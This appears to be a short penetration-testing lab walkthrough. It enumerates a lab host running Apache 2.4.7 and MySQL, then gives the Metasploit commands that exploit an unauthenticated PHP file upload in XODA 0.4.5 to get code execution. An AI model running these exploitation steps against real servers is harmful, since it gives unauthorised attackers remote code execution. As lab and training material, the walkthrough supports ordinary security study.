Apache httpd 2.4.7-XODA Vulnerability

#Enumeration

db_nmap -sV 192.170.151.3

80/tcp   open http Apache httpd 2.4.7 ((Ubuntu))
3306/tcp open mysql MySQL 5.5.47-0ubuntu0.14.04.1

curl http://192.170.151.3

#Exploitation

search xoda
use exploit/unix/webapp/xoda_file_upload
info
# Description:
#   This module exploits a file upload vulnerability found in XODA 
#   0.4.5. Attackers can abuse the "upload" command in order to upload a 
#   malicious PHP file without any authentication, which results in 
#   arbitrary code execution. The module has been tested successfully on 
#   XODA 0.4.5 and Ubuntu 10.04.
set TARGETURI /
run

PreviousLinux Exploitation NextSun Glassfish

Last updated 1 year ago